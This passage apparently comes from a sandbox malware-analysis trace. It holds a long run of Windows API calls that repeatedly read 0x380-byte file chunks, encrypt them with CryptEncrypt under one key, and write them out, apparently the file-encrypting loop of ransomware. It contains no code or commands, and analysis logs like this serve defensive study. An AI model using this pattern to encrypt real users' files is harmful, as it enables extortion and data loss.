lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.068] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.068] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.068] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.068] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.068] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.069] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.069] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.069] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.069] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.069] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.069] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.069] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.069] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.069] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.069] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.069] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.069] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.069] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.070] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.070] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.070] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.070] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.070] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.070] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.070] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.070] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.070] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.070] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.070] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.070] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.070] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.070] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.070] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.071] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.071] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.071] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.071] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.071] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.071] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.071] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.071] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.071] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.071] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.071] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.071] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.071] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.072] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.072] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.072] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.072] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.072] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.072] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.072] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.072] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.072] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.072] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.072] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.072] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.073] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.073] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.073] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.073] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.073] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.073] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.073] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.073] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.073] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.073] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.073] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.073] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.073] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.074] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.074] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.074] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.074] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.074] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.074] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.074] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.074] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.074] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.074] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.075] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.075] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.075] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.075] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.075] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.075] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.075] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.075] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.075] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.075] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.075] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.076] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.076] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.076] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.076] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.076] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.076] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.076] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.076] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.076] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.076] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.076] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.077] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, 